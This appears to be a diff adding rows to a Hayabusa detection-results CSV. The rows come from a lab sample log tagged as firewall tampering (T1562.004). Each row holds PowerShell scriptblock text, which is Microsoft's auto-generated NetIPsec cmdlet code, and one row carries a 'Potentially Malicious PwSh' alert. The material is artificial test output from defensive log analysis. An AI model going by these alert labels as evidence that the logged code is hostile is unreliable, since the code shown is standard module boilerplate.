[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ns $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 